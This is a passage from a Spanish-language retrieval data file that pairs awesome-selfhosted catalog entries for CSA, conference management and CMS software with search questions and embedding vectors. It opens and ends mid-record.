-0.09301, -0.10879, 0.04399, 0.06481, -0.00387, 0.02081, 0.00225, 0.0025, -0.07556, 0.01557, -0.03666, -0.01674, -0.06524, 0.0364, -0.0095, -0.06027, -0.11621, -0.00377, 0.03685, -0.0294, 0.02141, 0.03984, 0.05333, 0.01801, -0.0605, 0.03595, -0.01268, 0.0213, 0.08494, -0.03066, -0.03094, -0.06997, 0.06693, -0.0024, -0.10646, 0.00696, 0.03643, 0.03714, 0.01813, -0.02351, -0.06413, 0.12838, 0.07775, 0.00723, 0.07792, 0.01378, -0.02385, -0.0734, -0.01032, -0.0041, -0.02709, 0.00912, 0.02134, 0.0003, -0.03108, 0.00873, 0.0314, 0.01809, 0.01139, 0.04841, -0.05239, 0.06824, 0.05069, 0.0601, 0.0873, 0.00473, 0.07792, -0.02865, -0.04588, -0.04495, 0.00358, 0.05699, 0.02165, 0.0636, -0.04041, -0.03704, 0.03802, 0.0657, 0.02452, -0.02249, 0.03849, 0.07967, 0.00016, 0.02621, -0.0106, 0.00353, -0.03349, 0.03384, 0.02316, -0.0008, -0.00905, -0.00789, -0.04385, -0.00619, -0.0336, 0.09016, -0.02641, -0.00878, -0.04441, 0.0031, -0.06033, 0.01995, 0.00605, 0.01403, -0.05243, -0.00637, 0.06698, -0.02137, 0.00654, 0.05841]} +{"tipo": "pregunta", "herramienta": "Community-Supported Agriculture (CSA)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Community-Supported Agriculture (CSA)", "tema": "community-supported agriculture (csa)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Community-Supported Agriculture (CSA): ACP Admin β€” CSA administration. Manage members, subscriptions, deliveries, drop-off locations, member participation, invoices and emails (documentation in French) [MIT, Ruby]. FoodCoopShop β€” User-friendly software for food-coops [AGPL-3.0, PHP/Docker]. Foodsoft β€” Manage a non-profit food coop (product catalog, ordering, accounting, job scheduling) [AGPL-3.0, Docker/Ruby]. Hive-Pal β€” Mobile-first beekeeping management app for tracking hives, inspections, queen records, and equipment with streamlined data entry optimized for field use [MIT, Nodejs/Docker]. juntagrico β€” Management platform for community gardens and vegetable cooperatives [LGPL-3.0, Python]. Open Food Network β€” Online marketplace for local food. It enables a network of independent online food stores that connect farmers and food hubs with individuals and local businesses [AGPL-3.0, Ruby]. OpenOlitor β€” Administration platform for Community Supported Agriculture groups [AGPL-3.0, Scala].", "indexar": "que herramienta sirve para administrar un huerto comunitario o un CSA", "v": [0.09857, -0.04433, -0.13137, -0.15549, 0.01303, -0.21524, 0.02732, -0.01935, -0.03737, -0.0822, -0.16094, -0.01204, 0.05474, -0.00763, 0.12422, -0.03832, 0.15548, -0.1106, -0.02236, 0.02456, -0.03702, 0.08568, 0.05967, 0.01541, -0.14196, -0.06987, 0.05114, -0.00933, -0.08873, 0.11197, 0.10906, 0.12105, 0.0468, 0.0814, -0.03547, -0.02936, -0.0701, -0.05049, -0.03011, 0.00452, -0.08507, 0.14914, -0.05884, -0.01825, -0.07639, 0.01544, -0.00465, -0.13624, 0.00638, 0.02078, -0.07592, -0.15993, -0.10909, -0.05752, 0.06432, 0.05313, 0.03932, -0.10343, -0.02057, -0.17859, -0.13208, 0.06309, -0.0066, 0.00586, -0.09161, 0.00286, -0.04532, -0.01624, -0.08204, -0.01059, -0.05529, 0.05, 0.09262, -0.04717, -0.10494, 0.00694, 0.02535, 0.03848, 0.07949, -0.08171, 0.03663, 0.0152, -0.00933, -0.05867, -0.06808, -0.06984, 0.13675, -0.11259, 0.06274, -0.04645, 0.05455, 0.05141, -0.07497, 0.00086, -0.00173, 0.00583, 0.0366, 0.02555, 0.01128, -0.00639, 0.13933, -0.03901, -0.0922, 0.00641, -0.02979, 0.08976, -0.03437, 0.0296, -0.05629, 0.01659, 0.1362, 0.04743, 0.02935, -0.0452, 0.06835, 0.11242, -0.05565, -0.04651, -0.03071, -0.07506, 0.01841, 0.02135, 0.01324, -0.03777, 0.05147, -0.02783, -0.0406, 0.07227, 0.02657, 0.043, -0.10315, -0.01001, -0.00286, 0.04682, -0.01921, 0.01334, -0.00802, -0.13294, -0.03777, 0.00408, -0.02288, 0.05059, -0.0546, -0.09831, 0.08618, 0.01162, 0.04068, -0.02817, 0.03112, -0.02123, 0.10993, -0.03156, 0.02553, 0.03428, -0.09578, -0.03934, -0.0288, -0.02102, -0.07253, 0.07327, -0.00985, -0.08922, 0.04343, -0.01416, -0.01079, -0.0372, 0.06022, -0.01812, 0.09767, 0.07314, 0.0268, 0.00212, 0.01206, 0.01631, 0.0257, -0.08644, -0.03978, -0.02265, 0.08861, -0.01566, -0.10715, -0.01241, -0.07008, 0.01123, -0.01202, -0.03356, -0.0347, 0.01051, 0.0477, 0.03271, 0.03961, 0.04214, 0.0324, -0.10424, -0.0019, 0.02807, -0.01275, -0.07586, -0.00994, -0.00808, -0.02457, -0.00349, -0.00029, 0.00035, 0.03887, 0.04584, -0.01281, 0.0365, -0.01172, 0.08323, 0.05482, 0.02221, 0.02409, -0.01906, -0.04458, -0.04403, -0.01017, -0.02192, -0.02555, 0.00513, 0.03612, -0.01616, 0.00457, -0.03966, 0.05702, 0.01277, -0.03711, 0.02437, 0.03303, 0.00139, -0.00919, -0.01987, -0.03439, 0.04676, 0.05605, -0.07271, 0.06766, -0.07688, -0.07378, -0.03799, 0.03901, -0.02612, -0.0313, -0.0491, -0.03311, -0.06486, -0.02464, -0.02099, -0.0412, -0.06127, -0.0459, 0.00344, 0.10475, -0.02291, 0.02209, -0.0138]} +{"tipo": "pregunta", "herramienta": "Community-Supported Agriculture (CSA)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Community-Supported Agriculture (CSA)", "tema": "community-supported agriculture (csa)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Community-Supported Agriculture (CSA): ACP Admin β€” CSA administration. Manage members, subscriptions, deliveries, drop-off locations, member participation, invoices and emails (documentation in French) [MIT, Ruby]. FoodCoopShop β€” User-friendly software for food-coops [AGPL-3.0, PHP/Docker]. Foodsoft β€” Manage a non-profit food coop (product catalog, ordering, accounting, job scheduling) [AGPL-3.0, Docker/Ruby]. Hive-Pal β€” Mobile-first beekeeping management app for tracking hives, inspections, queen records, and equipment with streamlined data entry optimized for field use [MIT, Nodejs/Docker]. juntagrico β€” Management platform for community gardens and vegetable cooperatives [LGPL-3.0, Python]. Open Food Network β€” Online marketplace for local food. It enables a network of independent online food stores that connect farmers and food hubs with individuals and local businesses [AGPL-3.0, Ruby]. OpenOlitor β€” Administration platform for Community Supported Agriculture groups [AGPL-3.0, Scala].", "indexar": "cual es una alternativa libre a las plataformas de gestiΓ³n de cooperativas", "v": [0.15791, -0.00266, 0.00948, -0.05231, -0.02568, -0.11703, 0.14455, 0.05416, -0.2098, -0.13737, -0.11166, -0.10698, -0.00041, 0.0825, 0.06723, -0.02761, 0.1404, -0.1112, 0.00683, -0.00688, -0.06672, 0.03341, 0.00243, -0.00678, -0.01396, -0.09998, 0.0467, -0.0787, -0.06296, -0.00699, 0.03065, -0.02252, 0.08096, 0.03978, -0.05167, -0.01609, 0.03585, 0.0417, 0.09224, -0.1458, -0.00169, -0.07608, -0.07061, -0.01901, 0.06224, -0.05376, -0.12973, -0.02276, 0.00392, 0.0753, -0.12221, -0.05854, -0.11151, 0.01056, 0.09135, 0.01956, 0.09968, -0.06368, -0.04777, -0.03056, -0.06958, 0.01455, 0.06052, -0.08237, -0.01422, 0.05968, -0.08688, 0.01722, -0.05946, 0.1988, 0.14056, 0.06301, -0.00026, -0.01045, -0.05872, 0.07367, -0.0056, 0.00289, -0.08089, -0.04054, 0.15889, -0.08108, -0.03394, 0.12141, -0.00616, -0.10015, 0.06531, -0.0679, 0.03473, -0.04424, 0.02003, -0.04388, 0.02618, 0.05943, -0.01372, -0.06943, -0.02281, 0.07788, -0.03009, 0.03424, -0.03835, 0.03895, -0.06451, 0.01024, 0.00788, 0.03025, 0.03862, -0.03856, -0.05073, -0.00252, 0.0481, 0.04723, 0.04965, -0.04913, 0.01732, 0.06349, -0.06812, 0.05886, 0.07411, -0.01825, -0.00322, -0.07565, -0.00927, -0.11013, 0.14648, 0.03655, 0.05967, 0.0996, -0.00902, 0.05412, -0.05916, 0.0411, -0.08074, -0.04473, -0.0264, -0.08834, 0.05646, 0.06096, 0.04098, -0.07049, -0.09049, 0.06012, 0.01502, -0.13399, 0.06316, -0.05177, -0.06315, -0.09437, 0.01042, 0.02962, -0.06718, 0.03249, -0.02755, 0.07946, -0.06235, 0.04016, -0.06746, -0.02752, -0.13579, 0.1065, 0.05989, -0.06496, -0.08074, -0.0226, -0.04106, -0.00403, 0.03616, 0.06131, -0.03886, 0.00547, 0.02518, 0.06869, 0.01697, -0.05647, 0.08708, -0.07868, -0.01933, -0.07101, 0.0331, -0.03085, -0.04679, -0.01076, -0.08455, -0.03734, 0.01129, -0.03397, -0.03838, 0.04886, 0.02201, 0.08413, 0.02779, -0.03709, -0.07683, -0.05155, 0.00271, -0.02968, 0.0079, -0.04429, -0.02318, -0.00394, -0.07503, -0.01077, -0.02453, -0.05963, -0.04062, -0.00318, -0.07034, 0.0582, 0.0149, 0.02776, 0.05852, 0.04467, 0.03943, -0.02398, -0.03249, -0.05607, 0.00829, -0.01422, 0.01071, 0.00029, -0.00651, -0.00016, 0.02127, 0.03513, 0.02151, 0.10013, 0.03944, 0.07612, -0.01679, 0.00478, 0.00737, 0.00049, -0.02285, 0.05775, -0.00125, -0.05733, 0.04323, 0.00368, -0.067, -0.02021, -0.00242, 0.09528, -0.02622, 0.0121, -0.02464, 0.00762, -0.09141, -0.05168, -0.05704, -0.03823, -0.04832, 0.03293, 0.05879, 0.03325, 0.01392, 0.00508]} +{"tipo": "pregunta", "herramienta": "Community-Supported Agriculture (CSA)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Community-Supported Agriculture (CSA)", "tema": "community-supported agriculture (csa)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Community-Supported Agriculture (CSA): teikei β€” A web application that maps out community-supported agriculture based on crowdsourced data [AGPL-3.0, Nodejs].", "indexar": "ΒΏcon quΓ© puedo montar un sistema para gestionar la agricultura comunitaria?", "v": [-0.07239, 0.04965, -0.03638, -0.19342, -0.1451, -0.08339, 0.04803, 0.07532, -0.23423, -0.08227, -0.12558, -0.03154, 0.05231, 0.04235, 0.12042, 0.00471, 0.06555, -0.11545, 0.01437, -0.01057, -0.08227, -0.1072, 0.07187, -0.07181, -0.08881, 0.03463, 0.03049, -0.19363, -0.03992, 0.03317, 0.0945, 0.09978, 0.09829, 0.07007, -0.06676, 0.04976, 0.01434, -0.02524, 0.05009, -0.13587, -0.10847, -0.07111, 0.02619, -0.08952, -0.01688, 0.005, 0.06098, -0.16094, -0.03728, -0.04677, -0.12674, -0.06319, -0.03934, -0.04353, 0.04549, 0.03991, -0.02561, -0.06381, 0.07824, -0.03312, -0.02664, 0.10449, -0.04626, -0.0141, 0.00546, -0.00288, -0.05926, 0.00614, -0.04349, 0.08567, 0.10026, -0.03521, 0.03735, 0.01997, -0.0433, 0.04432, 0.16337, 0.05074, 0.06129, -0.05277, 0.03208, 0.02929, 0.00619, 0.03459, 0.10145, -0.04143, 0.01441, -0.07076, -0.01041, -0.01387, 0.0436, -0.01046, 0.01493, -0.11425, 0.07019, -0.04506, -0.04725, 0.06681, -0.07699, 0.01205, -0.1449, -0.023, -0.08685, 0.08154, -0.00888, 0.0009, 0.08747, -0.029, -0.00155, -0.03033, -0.03871, 0.02304, -0.05907, -0.0119, -0.0072, 0.07643, -0.02275, 0.08948, -0.01627, -0.00101, -0.03703, 0.08021, 0.10262, -0.00472, 0.20945, -0.02008, 0.05694, 0.12957, -0.01683, 0.13027, -0.0582, -0.03346, 0.02253, -0.05663, -0.00024, 0.00746, -0.01209, -0.0391, -0.08624, -0.0702, -0.04644, 0.03842, -0.05634, -0.09894, 0.05085, -0.03459, 0.02539, -0.14515, 0.07641, -0.00622, 0.0865, 0.05781, 0.01004, -0.03875, -0.02579, -0.02719, 0.04876, -0.03099, -0.06353, 0.02999, -0.04781, -0.04934, -0.08398, -0.01344, -0.0079, -0.02408, 0.04091, -0.05372, 0.02949, -0.01572, -0.01868, -0.02676, 0.06556, 0.01234, 0.0867, -0.00545, -0.00481, -0.08259, 0.05157, 0.01555, -0.06424, 0.03367, 0.0262, 0.02042, -0.00765, 0.0589, -0.0767, 0.03967, 0.00441, 0.04486, 0.04569, 0.07658, 0.02408, -0.03231, 0.05262, -0.01974, 0.00066, -0.0249, -0.08146, 0.04262, -0.03692, 0.0026, 0.06768, -0.02091, 0.03181, -0.01652, 0.0186, 0.06988, 0.03386, 0.01642, 0.00142, 0.06107, 0.08457, -0.01234, -0.06772, -0.01289, -0.03533, 0.0239, -0.02478, -0.06334, -0.00298, -0.02072, 0.03203, 0.01528, -0.00968, -0.03063, -0.00639, 0.05916, 0.04995, -0.01215, -0.02794, -0.00703, -0.01509, 0.07544, -0.03567, -0.07402, 0.02264, -0.02494, -0.0152, 0.0404, 0.0559, 0.01627, 0.04101, -0.03959, -0.08448, -0.00813, -0.05494, 0.03427, -0.00061, -0.03178, -0.03439, 0.0064, -0.01324, 0.02544, 0.00834, 0.06803]} +{"tipo": "pregunta", "herramienta": "Community-Supported Agriculture (CSA)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Community-Supported Agriculture (CSA)", "tema": "community-supported agriculture (csa)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Community-Supported Agriculture (CSA): teikei β€” A web application that maps out community-supported agriculture based on crowdsourced data [AGPL-3.0, Nodejs].", "indexar": "ΒΏhay una aplicaciΓ³n web que mappee los cultivos con datos de la comunidad?", "v": [0.05707, 0.10428, 0.03928, -0.15726, 0.0055, -0.09193, 0.02724, 0.08946, -0.06213, 0.02639, -0.13314, -0.11701, 0.01233, 0.02164, -0.0529, -0.01409, 0.0928, -0.0719, 0.02745, -0.0737, -0.1032, -0.00235, -0.11789, 0.02055, -0.21033, 0.01469, 0.08099, -0.06101, -0.14168, 0.00871, 0.04426, 0.07526, -0.09278, 0.02974, -0.06906, -0.04142, -0.00847, -0.05204, -0.12174, -0.11954, -0.01423, -0.14968, -0.13944, 0.04119, -0.13203, 0.0871, -0.09756, 0.00216, -0.04415, -0.03348, -0.12072, 0.00396, -0.03062, 0.012, 0.03972, 0.00655, 0.11164, -0.1313, 0.11165, 0.03397, -0.13741, 0.01078, 0.02423, -0.1104, 0.01239, -0.09863, 0.04417, 0.10361, -0.04777, 0.15263, 0.01946, 0.13247, 0.04773, -0.0327, 0.0414, 0.01163, 0.05281, -0.0003, -0.06823, -0.01319, 0.04443, -0.02823, -0.09019, -0.00436, -0.03763, -0.01498, 0.0424, -0.01707, 0.08364, -0.06821, 0.09701, 0.10434, -0.03178, 0.04982, 0.08267, -0.09013, -0.00462, 0.01939, 0.05732, 0.03592, -0.0173, -0.03049, -0.06412, -0.02262, 0.01195, 0.11267, 0.08401, -0.0269, -0.15024, 0.05066, 0.05541, -0.05784, -0.01787, -0.01126, 0.05428, -0.02526, 0.04337, 0.02324, 0.00173, -0.09811, -0.06872, -0.02415, 0.11184, -0.0495, 0.0396, 0.00576, -0.08645, 0.10068, -0.00506, 0.09859, -0.06344, -0.02307, -0.07936, -0.02265, 0.02004, 0.03847, -0.05197, -0.10194, 0.00707, 0.04162, -0.01576, 0.01652, -0.05639, -0.01541, 0.0255, -0.07003, -0.03271, -0.0225, -0.04986, 0.00372, 0.02119, -0.01012, -0.03271, 0.03517, -0.07091, 0.0371, 0.01176, -0.13325, -0.04069, -0.00341, -0.05033, 0.01189, -0.05157, 0.01007, 0.00265, -0.05749, 0.069, -0.00329, 0.11731, 0.03527, -0.05115, -0.00611, 0.03751, -0.08545, 0.0624, -0.04617, -0.01604, -0.064, 0.00794, -0.02942, -0.02687, -0.02265, 0.04906, 0.05258, -0.03808, 0.0137, -0.02611, -0.00861, 0.03663, 0.01427, 0.03514, 0.14216, 0.02809, -0.00038, 0.00416, -0.05163, 0.01218, -0.00118, -0.00053, -0.04899, -0.07072, -0.00731, -0.03335, 0.0038, 0.03494, 0.06798, -0.01344, -0.01915, -0.03545, 0.01309, -0.0127, -0.00017, 0.10219, 0.01751, -0.02356, -0.11944, 0.12196, -0.02053, -0.05339, -0.05367, -0.01979, 0.05754, 0.03737, -0.03785, -0.00995, 0.03191, 0.03326, -0.00227, 0.03332, -0.04911, 0.00494, 0.0033, -0.00521, -0.04236, 0.03165, -0.00171, 0.02598, -0.06336, -0.05503, -0.04378, 0.03702, 0.04305, 0.02591, -0.04663, -0.05379, -0.03451, -0.06498, 0.03055, 0.00108, -0.0819, -0.04504, -0.03668, 0.08397, -0.00461, 0.06106, 0.01509]} +{"tipo": "pregunta", "herramienta": "Conference Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Conference Management", "tema": "conference management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Conference Management: indico β€” Feature-rich event management system, made @ CERN, the place where the Web was born [MIT, Python]. motion.tools (AntragsgrΓΌn) β€” Manage motions and amendments for (political) conventions [AGPL-3.0, PHP/Docker]. OpenSlides β€” Presentation and assembly system for managing and projecting agenda, motions and elections of an assembly [MIT, Docker]. osem β€” Event management tailored to free Software conferences [MIT, Ruby/Docker]. pretalx β€” Web-based event management, including running a Call for Papers, reviewing submissions, and scheduling talks. Exports and imports for various related tools [Apache-2.0, Python].", "indexar": "cual es una herramienta para gestionar congresos y eventos?", "v": [0.03487, 0.02993, 0.00376, -0.24834, 0.07126, -0.10925, -0.02873, 0.04175, -0.04219, -0.11923, -0.19755, -0.05424, -0.0489, -0.03663, 0.02359, 0.10383, 0.18457, -0.0798, -0.00721, 0.04224, -0.09055, 0.07142, -0.01224, -0.03592, -0.0865, -0.10867, 0.10581, -0.04904, -0.10492, 0.01769, -0.02718, -0.03566, 0.05253, -0.12877, 0.0349, -0.04368, -0.07149, 0.12277, -0.0929, 0.01269, -0.1461, -0.00348, -0.11902, 0.0015, 0.03792, -0.16528, -0.03279, 0.02645, -0.03534, 0.02328, -0.06819, -0.04421, -0.12644, 0.01398, -0.00294, -0.10445, -0.01743, -0.15098, 0.00318, -0.08821, -0.08932, 0.02375, -0.11645, 0.08827, -0.0195, 0.01693, 0.02532, -0.10361, -0.0566, 0.11268, -0.09127, 0.01297, 0.04817, 0.06148, 0.09283, -0.0074, 0.11057, 0.10565, -0.06259, 0.0118, 0.02677, -0.02881, -0.07206, 0.06965, -0.07306, -0.07866, 0.03349, -0.01228, -0.02277, 0.03393, -0.04506, 0.00499, 0.03457, -0.12036, -0.04598, -0.07475, 0.0771, -0.02387, -0.03403, 0.01755, 0.09797, 0.03429, -0.07169, 0.03621, -0.07899, -0.01151, 0.02063, 0.02723, 0.01153, -0.00981, -0.04911, 0.05631, 0.03918, 0.03784, 0.04148, 0.08554, 0.02629, -0.07033, 0.07126, -0.04205, -0.02092, 0.00445, -0.0009, -0.03562, 0.05118, 0.06051, -0.04801, 0.12991, -0.02931, -0.05066, 0.02327, -0.0919, -0.06298, 0.03368, 0.00011, -0.03881, 0.0174, -0.1165, 0.01852, -0.05893, -0.04432, 0.04913, -0.04324, -0.05729, 0.08597, -0.01341, 0.02989, 0.02711, 0.00791, 0.0722, 0.06705, -0.05236, 0.03689, 0.0814, -0.07824, -0.05835, -0.13994, 0.02331, -0.04015, -0.04457, -0.12767, -0.03752, 0.07345, 0.00503, 0.0097, 0.00326, 0.03885, 0.03497, 0.03022, 0.08943, 0.03165, 0.02398, 0.04988, -0.02247, 0.02711, -0.04901, -0.06172, -0.08088, 0.00747, -0.09803, 0.01138, 0.00375, -0.02809, -0.03718, 0.04885, -0.02637, 0.06154, 0.03288, -0.01872, 0.03038, 0.0224, 0.08434, 0.03946, -0.12448, 0.06687, 0.00491, -0.0395, -0.13197, 0.05856, 0.00615, -0.01458, 0.00547, 0.0042, -0.04293, 0.01708, 0.02926, -0.04134, 0.02883, 0.03842, -0.02349, -0.01418, 0.05997, 0.01109, -0.01136, -0.04331, -0.03111, -0.00226, 0.08259, -0.00312, -0.05459, 0.02201, -0.04546, 0.04653, -0.00908, -0.00874, -0.00276, 0.02842, 0.00591, -0.00834, -0.01625, 0.04226, 0.01541, 0.00177, 0.0838, 0.03076, -0.02165, 0.06467, -0.04375, -0.01175, 0.0034, -0.02079, -0.00528, 0.03315, -0.05781, -0.05259, -0.00475, -0.0557, 0.01429, -0.05798, -0.04137, 0.02423, -0.02867, 0.06836, -0.01835, 0.03214, 0.02097]} +{"tipo": "pregunta", "herramienta": "Conference Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Conference Management", "tema": "conference management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Conference Management: indico β€” Feature-rich event management system, made @ CERN, the place where the Web was born [MIT, Python]. motion.tools (AntragsgrΓΌn) β€” Manage motions and amendments for (political) conventions [AGPL-3.0, PHP/Docker]. OpenSlides β€” Presentation and assembly system for managing and projecting agenda, motions and elections of an assembly [MIT, Docker]. osem β€” Event management tailored to free Software conferences [MIT, Ruby/Docker]. pretalx β€” Web-based event management, including running a Call for Papers, reviewing submissions, and scheduling talks. Exports and imports for various related tools [Apache-2.0, Python].", "indexar": "que programa puedo usar para organizar asambleas y presentar agendas?", "v": [0.11792, 0.18477, -0.15099, -0.18411, 0.11757, 0.00402, 0.06549, -0.0614, -0.23764, -0.04159, -0.17933, -0.05505, -0.06155, -0.04404, 0.02531, 0.07673, 0.11921, -0.04333, 0.04302, 0.08761, -0.01407, 0.11453, -0.063, 0.09282, -0.06988, -0.07014, 0.15376, -0.08672, 0.00049, -0.07865, -0.01837, -0.00317, 0.06128, -0.09263, 0.09308, -0.0861, -0.04961, 0.04983, -0.11256, -0.0393, -0.13882, 0.06548, -0.11664, -0.01626, 0.04939, -0.00837, 0.00236, 0.03225, -0.08056, -0.03315, -0.07217, -0.01141, -0.02479, 0.06824, 0.0473, -0.10063, -0.05681, -0.15508, -0.09338, -0.05149, 0.0105, 0.01072, 0.05866, 0.02632, 0.04591, 0.06134, 0.01624, 0.01745, -0.0275, 0.03484, -0.10267, -0.03684, 0.04417, -0.03821, 0.03182, 0.04285, -0.01291, 0.00578, 0.00266, 0.02268, -0.00314, -0.08314, -0.02808, 0.14115, -0.09664, -0.13566, 0.07683, -0.00225, -0.01183, 0.03629, -0.03229, 0.07129, 0.00113, -0.02178, 0.04742, -0.04712, 0.1119, 0.13462, 0.10115, 0.03861, -0.02918, -0.08023, -0.02413, 0.05209, -0.11371, 0.02477, 0.04757, -0.03826, 0.02898, -0.01061, -0.09976, 0.02114, -0.04874, 0.00145, -0.05716, -0.05314, 0.04095, 0.04526, 0.04783, -0.04376, -0.03433, 0.03176, -0.02871, 0.07053, 0.08155, -0.03074, 0.03189, 0.16295, -0.04718, 0.07825, 0.01302, 0.01227, -0.05989, -0.03413, -0.1132, -0.07538, -0.03326, -0.02879, 0.05698, -0.01802, -0.01418, 0.10901, -0.05237, -0.05561, 0.07843, -0.02997, -0.04249, -0.01669, -0.04533, 0.08395, 0.09567, -0.01348, 0.08085, 0.04727, -0.00732, -0.0255, -0.03667, -0.01405, 0.01869, -0.02796, -0.09402, -0.04216, -0.0168, -0.05331, 0.05848, -0.07062, 0.01716, 0.03539, 0.0194, 0.07143, 0.03188, 0.08466, 0.02853, -0.06103, 0.02108, -0.03132, 0.0344, -0.01686, 0.00934, 0.00747, -0.01636, 0.08143, 0.00431, 0.00314, 0.00689, 0.01175, -0.00382, 0.01135, 0.02439, 0.01028, 0.00853, 0.03998, 0.05838, 0.00515, 0.00031, -0.02319, -0.02963, -0.05484, 0.02536, -0.04246, -0.02335, -0.02562, -0.04787, -0.03722, 0.07831, 0.02555, -0.10861, 0.03298, 0.02443, 0.12182, 0.04026, -0.00643, 0.0354, 0.00324, -0.09139, -0.01193, -0.0538, 0.0206, 0.03449, 0.02885, 0.00938, 0.03445, 0.0479, -0.03384, 0.00828, -0.03491, 0.0383, -0.00694, 0.04889, 0.04497, -0.01044, 0.04243, 0.00992, -0.01916, -0.00434, 0.01502, 0.00627, -0.04449, 0.00673, -0.04974, -0.01562, 0.07387, 0.00592, -0.0353, -0.04818, -0.04099, -0.03634, 0.05969, 0.00282, -0.04086, 0.01724, 0.04022, 0.07815, -0.05096, -0.01198, 0.01717]} +{"tipo": "pregunta", "herramienta": "Conference Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Conference Management", "tema": "conference management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Conference Management: indico β€” Feature-rich event management system, made @ CERN, the place where the Web was born [MIT, Python]. motion.tools (AntragsgrΓΌn) β€” Manage motions and amendments for (political) conventions [AGPL-3.0, PHP/Docker]. OpenSlides β€” Presentation and assembly system for managing and projecting agenda, motions and elections of an assembly [MIT, Docker]. osem β€” Event management tailored to free Software conferences [MIT, Ruby/Docker]. pretalx β€” Web-based event management, including running a Call for Papers, reviewing submissions, and scheduling talks. Exports and imports for various related tools [Apache-2.0, Python].", "indexar": "con que software puedo manejar convocatorias de ponencias y votaciones en conferencias?", "v": [0.24303, 0.01756, -0.11703, -0.14402, 0.10787, -0.01383, 0.15607, -0.13969, -0.09476, -0.192, 0.04298, 0.05614, 0.07052, -0.04173, -0.11267, 0.1625, 0.17163, -0.05612, 0.047, 0.11361, -0.05684, -0.05135, -0.02117, -0.0112, 0.07857, -0.00311, 0.06253, -0.06742, 0.06158, -0.05369, 0.05377, -0.07443, -0.01819, 0.04569, 0.03997, 0.07265, -0.08256, 0.08639, -0.01635, 0.01527, -0.12392, 0.08492, -0.06158, -0.04611, 0.0102, -0.10359, -0.09567, 0.09961, -0.07841, -0.05592, -0.06245, -0.02842, 0.05892, 0.07149, 0.05894, -0.05476, 0.04937, 0.04112, -0.06697, -0.12811, -0.01515, 0.09075, -0.02039, -0.0103, 0.01173, 0.03398, 0.00738, -0.06379, -0.02925, 0.06421, -0.14938, -0.07369, 0.03853, 0.06506, 0.04947, -0.01845, -0.09024, 0.02708, 0.00875, 0.0876, 0.00879, -0.0724, -0.00245, 0.03582, -0.10038, 0.016, 0.05673, -0.1148, -0.02004, -0.03741, -0.0309, 0.01922, 0.02544, -0.02562, -0.01888, -0.01171, 0.11502, 0.13047, 0.0627, -0.00445, -0.04714, 0.02687, -0.02388, 0.05724, -0.04808, -0.01604, 0.03726, -0.14971, 0.02169, -0.04784, -0.032, 0.05806, 0.0173, -0.07817, 0.0558, -0.02555, 0.05751, -0.02894, 0.01299, -0.05565, 0.09484, -0.05344, 0.00413, -0.07132, -0.01082, 0.02547, -0.04537, 0.08219, 0.0081, -0.04831, 0.05464, -0.05993, -0.04971, -0.05816, 0.12128, -0.00605, 0.02861, -0.03287, 0.01553, -0.00271, -0.00445, 0.08996, 0.05767, -0.11081, 0.09865, 0.01425, 0.01726, -0.05552, 0.03357, -0.0829, 0.04012, -0.02286, 0.08275, 0.07486, -0.04711, -0.04781, -0.03046, -0.04287, -0.02226, 0.07434, -0.09624, 0.05746, -0.04222, -0.05021, -0.02113, -0.0025, 0.00751, 0.00027, 0.00481, 0.1055, -0.01128, 0.09702, -0.0066, -0.05717, -0.0442, -0.05857, -0.06239, -0.03039, -0.02696, -0.14319, -0.01555, -0.00705, -0.00318, -0.05981, 0.04147, 0.06764, -0.0052, 0.02079, 0.05472, 0.01703, -0.00435, 0.08677, 0.01472, -0.01171, -0.01097, -0.01748, -0.04289, -0.04622, 0.05564, -0.01686, -0.06782, 0.02963, -0.04447, -0.04054, 0.09094, 0.09135, -0.05351, 0.06222, -0.00892, 0.04506, -0.01661, -0.00534, 0.02041, -0.04345, -0.02453, -0.04297, -0.01388, 0.03084, -0.02042, 0.03702, 0.03998, -0.0177, 0.06994, -0.01363, 0.03093, 0.00021, 0.01648, -0.01329, 0.02166, 0.03088, -0.00171, 0.00535, -0.02833, -0.04111, 0.01686, 0.05228, 0.02492, 0.01848, -0.04429, -0.05369, -0.03016, 0.0108, 0.00286, -0.11021, -0.0044, -0.03077, -0.07998, 0.01374, 0.01162, -0.0351, -0.05212, 0.0571, 0.04213, -0.04053, 0.02884, -0.03401]} +{"tipo": "pregunta", "herramienta": "Content Management Systems (CMS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Content Management Systems (CMS)", "tema": "content management systems (cms)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Content Management Systems (CMS): Alfresco Community Edition β€” The open source Enterprise Content Management software that handles any type of content, allowing users to easily share and collaborate on content [LGPL-3.0, Java]. Apostrophe β€” CMS with a focus on extensible in-context editing tools [MIT, Nodejs]. Automad β€” Flat-file content management system and template engine [MIT, PHP/Docker]. Backdrop CMS β€” Comprehensive CMS for small to medium sized businesses and non-profits [GPL-2.0, PHP]. Bludit β€” Build a site or blog in seconds. Bludit uses flat-files (text files in JSON format) to store posts and pages [⚠, MIT, PHP]. Bolt CMS β€” Content Management Tool, which strives to be as simple and straightforward as possible [MIT, PHP]. CMS Made Simple β€” Faster and easier management of website contents, scalable for small businesses to large corporations [GPL-2.0, PHP]. Cockpit β€” Simple content platform to manage any structured content [MIT, PHP]. Concrete 5 CMS β€” Open source content management system [MIT, PHP].", "indexar": 